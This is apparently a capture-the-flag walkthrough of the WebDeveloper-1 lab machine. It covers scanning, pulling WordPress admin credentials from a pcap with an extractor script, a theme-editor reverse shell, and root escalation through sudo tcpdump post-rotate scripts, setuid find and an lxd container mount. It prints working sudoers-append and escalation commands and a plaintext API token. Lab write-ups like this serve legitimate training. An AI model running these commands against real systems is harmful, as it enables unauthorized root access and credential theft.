WebDeveloper-1

Information gathering

```
arp-scan -l
nmap --min-rate 100000 -p- 192.168.240.136
nmap --min-rate 100000 -p80,22 -A 192.168.240.136
nikto -host 192.168.240.136 -p 80
wpscan --url http://192.168.240.136/ -eu --api-token rhXTa9t3zrV0zXuzHKI6pV7H37cfl41OQqYNgQyWH5k
dirb http://192.168.240.136/
```
```
$ nmap --min-rate 100000 -p80,22 -A 192.168.240.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-08 19:37 CST
Nmap scan report for 192.168.240.136
Host is up (0.00036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
|   256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
|_  256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Database Error
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:99:3D:7A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.240.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.28 seconds
```
```
$ nikto -host 192.168.240.136 -p 80
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.240.136
+ Target Hostname:    192.168.240.136
+ Target Port:        80
+ Start Time:         2024-12-08 19:38:15 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /xmlrpc.php: xmlrpc.php was found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /license.txt: License file found may identify site software.
+ /wp-admin/: Admin login page/section found.
+ /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-12-08 19:38:27 (GMT8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
```
$ wpscan --url http://192.168.240.136/ -eu --api-token rhXTa9t3zrV0zXuzHKI6pV7H37cfl41OQqYNgQyWH5k
_______________________________________________________________

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.240.136/ [192.168.240.136]
[+] Started: Sun Dec  8 19:48:06 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.240.136/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.240.136/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.240.136/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.240.136/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.240.136/index.php/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>
 |  - http://192.168.240.136/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9.8</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://192.168.240.136/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-11-12T00:00:00.000Z
 | Readme: http://192.168.240.136/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.8
 | Style URL: http://192.168.240.136/wp-content/themes/twentyseventeen/style.css?ver=4.9.8
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.240.136/wp-content/themes/twentyseventeen/style.css?ver=4.9.8, Match: 'Version: 1.7'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] webdeveloper
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.240.136/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Sun Dec  8 19:48:09 2024
[+] Requests Done: 57
[+] Cached Requests: 9
[+] Data Sent: 13.949 KB
[+] Data Received: 338.115 KB
[+] Memory used: 180.637 MB
[+] Elapsed time: 00:00:03
```
```
$ dirb http://192.168.240.136/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec  8 19:53:54 2024
URL_BASE: http://192.168.240.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.240.136/ ----
+ http://192.168.240.136/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.240.136/ipdata/
+ http://192.168.240.136/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.240.136/wp-admin/
==> DIRECTORY: http://192.168.240.136/wp-content/
==> DIRECTORY: http://192.168.240.136/wp-includes/
+ http://192.168.240.136/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.240.136/ipdata/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/ ----
+ http://192.168.240.136/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.240.136/wp-admin/css/
==> DIRECTORY: http://192.168.240.136/wp-admin/images/
==> DIRECTORY: http://192.168.240.136/wp-admin/includes/
+ http://192.168.240.136/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.240.136/wp-admin/js/
==> DIRECTORY: http://192.168.240.136/wp-admin/maint/
==> DIRECTORY: http://192.168.240.136/wp-admin/network/
==> DIRECTORY: http://192.168.240.136/wp-admin/user/

---- Entering directory: http://192.168.240.136/wp-content/ ----
+ http://192.168.240.136/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.240.136/wp-content/plugins/
==> DIRECTORY: http://192.168.240.136/wp-content/themes/
==> DIRECTORY: http://192.168.240.136/wp-content/uploads/

---- Entering directory: http://192.168.240.136/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.240.136/wp-admin/network/ ----
+ http://192.168.240.136/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.240.136/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.240.136/wp-admin/user/ ----
+ http://192.168.240.136/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.240.136/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.240.136/wp-content/plugins/ ----
+ http://192.168.240.136/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.240.136/wp-content/themes/ ----
+ http://192.168.240.136/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.240.136/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Dec  8 19:54:14 2024
DOWNLOADED: 32284 - FOUND: 12
```

Penetration testing

Port 80 is yet another WordPress site.

http://192.168.240.136/ipdata/ offers a packet capture for download.

http://192.168.240.136/xmlrpc.php only accepts POST requests (the 405 dirb got for it says the same).

Open the capture in Wireshark, filter for POST requests with `http.request.method == "POST"`, and follow the TCP stream; the login form body contains the password:

```
log=webdeveloper&pwd=Te5eQg&4sBS!Yr$)wf%(DcAd&wp-submit=Log+In&redirect_to=http://192.168.1.176/wordpress/wp-admin/&testcookie=1
```

Note that the password is not URL-encoded in the capture: it is everything between `pwd=` and `&wp-submit=`, that is `Te5eQg&4sBS!Yr$)wf%(DcAd`, not just `Te5eQg`. A form decoder that splits on `&` would truncate it.
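The Wireshark step above (filter POST requests, follow the TCP stream) done with the Python standard library, as an added example that is not part of the original writeup. It assumes a classic pcap file (not pcapng) with Ethernet framing; the capture it parses is constructed in memory from the login body shown above, and the MAC addresses, client IP and source port in the constructed frame are made up. The detail worth seeing is the extractor cutting the password out between the wp-login field names rather than splitting the body on `&`, because the captured password contains a literal `&`.

```python
"""Extract WordPress login credentials from a pcap, stdlib only (added example).

Walk the pcap records, glue each TCP flow's payload together in sequence order,
find POSTs to wp-login.php and cut the log= / pwd= fields out of the body.  The
capture below is constructed in memory so the script runs offline; call
extract_wp_logins(open("capture.pcap", "rb").read()) on the real file instead.
"""
import struct
from collections import defaultdict

# Constructed login body with the same shape as the one recovered from the capture.
# The password keeps its raw '&' and '%(': urllib.parse.parse_qs() on this body
# would return pwd=['Te5eQg'] and silently lose the rest.
SAMPLE_BODY = (b"log=webdeveloper&pwd=Te5eQg&4sBS!Yr$)wf%(DcAd&wp-submit=Log+In"
               b"&redirect_to=http://192.168.1.176/wordpress/wp-admin/&testcookie=1")


def build_http_post_packet(body, seq=1, path=b"/wordpress/wp-login.php"):
    """Ethernet/IPv4/TCP/HTTP POST frame; checksums left zero (test data only)."""
    http = (b"POST " + path + b" HTTP/1.1\r\n"
            b"Host: 192.168.1.176\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n" + body)
    # sport, dport, seq, ack, data offset (5 words), flags PSH|ACK, window, csum, urg
    tcp = struct.pack("!HHIIBBHHH", 49152, 80, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + http
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     bytes([192, 168, 1, 2]), bytes([192, 168, 1, 176])) + tcp
    return b"\x00\x0c\x29\x99\x3d\x7a\x00\x0c\x29\x00\x00\x01\x08\x00" + ip  # made-up MACs


def build_pcap(frames):
    """Little-endian pcap 2.4 file, LINKTYPE_ETHERNET (1), one record per frame."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1733660000 + i, 0, len(frame), len(frame)) + frame
    return out


def tcp_streams(pcap):
    """Yield (flow, payload) per unidirectional TCP flow, segments joined by seq."""
    magic = struct.unpack_from("<I", pcap, 0)[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"   # otherwise the writer was big-endian
    if struct.unpack_from(endian + "I", pcap, 20)[0] != 1:
        raise ValueError("only Ethernet captures are handled")
    flows, off = defaultdict(list), 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack_from(endian + "IIII", pcap, off)[2]
        frame, off = pcap[off + 16:off + 16 + incl_len], off + 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                   # not IPv4, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        total_len = struct.unpack_from("!H", frame, 16)[0]
        sport, dport, seq = struct.unpack_from("!HHI", frame, 14 + ihl)
        data_off = (frame[14 + ihl + 12] >> 4) * 4
        payload = frame[14 + ihl + data_off:14 + total_len]
        if payload:
            flows[(frame[26:30], sport, frame[30:34], dport)].append((seq, payload))
    for flow, segs in flows.items():
        yield flow, b"".join(p for _, p in sorted(segs))


def extract_wp_logins(pcap):
    """Return [(user, password), ...] for every POST to wp-login.php in the capture."""
    creds = []
    for _, stream in tcp_streams(pcap):
        for req in stream.split(b"POST ")[1:]:
            head, _, rest = req.partition(b"\r\n\r\n")
            if b"wp-login.php" not in head.split(b"\r\n", 1)[0]:
                continue
            clen = next((int(line.split(b":", 1)[1].strip()) for line in head.split(b"\r\n")
                         if line.lower().startswith(b"content-length:")), len(rest))
            body = rest[:clen].decode("latin-1")
            # Cut between the fixed field names of the wp-login form instead of
            # splitting on '&': the password itself is not URL-encoded here.
            user = body.partition("log=")[2].partition("&pwd=")[0]
            pwd = body.partition("&pwd=")[2].partition("&wp-submit=")[0]
            creds.append((user, pwd))
    return creds


if __name__ == "__main__":
    for user, pwd in extract_wp_logins(build_pcap([build_http_post_packet(SAMPLE_BODY)])):
        print(f"{user}:{pwd}")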


Log straight into the admin backend at http://192.168.240.136/wp-admin/user/admin.php with those credentials.

In the theme editor, open 404.php, write a reverse shell into it, and trigger it by requesting http://192.168.240.136/wp-content/themes/twentysixteen/404.php directly, or simply http://192.168.240.136/404.php. (The direct theme path runs whichever theme's file you edited; a request for a non-existent page only runs the active theme's 404.php, and wpscan reported twentyseventeen as the active theme, so edit that one if you want the short URL to work.)

Once the shell connects, upgrade it to an interactive one:

```
python -c 'import pty;pty.spawn("/bin/bash")'
```

or:

```
bash -i
```


Privilege escalation

Start with the config: `cat /var/www/html/wp-config.php`. It holds the database credentials webdeveloper / MasterOfTheUniverse, and the same password is reused for the local user webdeveloper.


`sudo -l` shows that webdeveloper may run /usr/sbin/tcpdump as root.


By default an ordinary Linux user has no permission to use tcpdump,

so root has to grant it:

```
root# setcap cap_net_raw=eip /usr/sbin/tcpdump
```

Do not give ordinary users sudo rights to tcpdump, as in

```
zhangsan ALL=(root) NOPASSWD: /usr/bin/awk, /usr/bin/less /tmp/abc.text, /usr/sbin/tcpdump
```

because it is then very easy to escalate to root through tcpdump:

```
sudo tcpdump -i any -w /dev/null -G 1 -z /tmp/test.sh -Z root
```

test.sh is executed with root privileges, so the script can simply modify /etc/sudoers and escalate zhangsan.

tcpdump
TCP flag values: tcp-fin, tcp-syn, tcp-rst, tcp-push, tcp-ack, tcp-urg

```
tcpdump -i any tcp dst port 6379 and 'tcp[tcpflags] & tcp-push != 0' -w 1234.cap
tcpdump -i any dst host 10.100.125.22 and tcp dst port 8082 and 'tcp[tcpflags] & tcp-push != 0'
```
————————————————

Copyright notice: this is an original article by the blogger, licensed under CC 4.0 BY-SA; include the original link and this notice when reposting.

Original link: https://blog.csdn.net/lyyslsw1230_163com/article/details/103765216


That did not pop a shell; keep looking, failure is only temporary. For privilege-escalation one-liners of every kind, see:

https://gtfobins.github.io/
Check whether find already has the setuid bit:

```
find / -perm -4000 2>/dev/null | grep find
```

Nothing has setuid yet. Use tcpdump's post-rotate hook to set it as root: `-G 1 -W 1` rotates the capture file after one second and exits after one file, `-z` runs the given command on each rotated file, and `-Z root` stops tcpdump from dropping to its unprivileged user, so the script runs as root.

```
echo "chmod u+s /usr/bin/find" > shell.sh
chmod +x shell.sh
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root
```

Confirm that find now carries the setuid bit:

```
find / -perm -4000 2>/dev/null | grep find
```

Then use find to escalate:

```
find /tmp -exec sh -i \;      # this did not give a root shell
find . -exec /bin/sh -p \;    # -p makes the shell keep the setuid effective UID instead of resetting it to the real UID
```

```
webdeveloper@webdeveloper:/tmp$ echo 'echo "%webdeveloper ALL=(ALL:ALL) ALL" >> /etc/sudoers' > test.sh
webdeveloper@webdeveloper:/tmp$ chmod +x test.sh
webdeveloper@webdeveloper:/tmp$ sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/test.sh -Z root
dropped privs to root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
14 packets received by filter
0 packets dropped by kernel
webdeveloper@webdeveloper:/tmp$ sudo -l
Matching Defaults entries for webdeveloper on webdeveloper:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webdeveloper may run the following commands on webdeveloper:
    (root) /usr/sbin/tcpdump
    (ALL : ALL) ALL
webdeveloper@webdeveloper:/tmp$ sudo su
root@webdeveloper:/tmp#
```

Learning a new escalation method: mount-based privilege escalation (lxd)

Abuse membership of the lxd group to mount the host filesystem inside a privileged container and modify root-owned files: https://reboare.github.io/lxd/lxd-escape.html

Initialise lxd, accepting the defaults by pressing Enter at every prompt:

```
lxd init
```

Create a privileged container. This pulls the ubuntu:16.04 image over the network, which takes a few minutes; on a target without outbound access, build a minimal image elsewhere and bring it in with `lxc image import` instead.

```
lxc init ubuntu:16.04 test -c security.privileged=true
```

Attach the host's root filesystem to the container as a disk device at /mnt/root, then start the container and get a shell inside it:

```
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
lxc start test
lxc exec test bash
```

Inside the container the host's files are writable as root, so the same sudoers edit as before works, just against the mounted path:

```
echo "%webdeveloper ALL=(ALL:ALL) ALL" >> /mnt/root/etc/sudoers
exit
sudo su
```